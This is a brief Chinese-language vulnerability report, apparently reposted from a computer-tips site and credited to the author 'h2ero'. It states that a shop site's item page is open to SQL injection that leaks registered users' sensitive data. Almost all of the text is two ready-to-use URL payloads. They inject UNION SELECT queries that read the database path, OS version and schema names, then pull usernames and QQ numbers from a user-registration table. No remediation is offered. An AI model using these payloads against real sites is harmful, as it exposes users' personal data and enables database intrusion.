存在SQL注入。注册用户信息敏感泄漏。
?mod=shop_view&act=item&id=-8401%20union%20select%201,2,3,4,5,6,7,@@datadir,@@global.version_compile_os,10,TABLE_SCHEMA,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.KEY_COLUMN_USAGE%20limit%200,1--
?mod=shop_view&act=item&id=-8401%20union%20select%201,2,3,4,5,6,7,8,9,qq,username,12,13,14,15,16,17,18,19,20,21%20from%20tmall.reg%20limit%20115,1--
作者 h2ero
,www.xuhantao.com,涛涛电脑知识网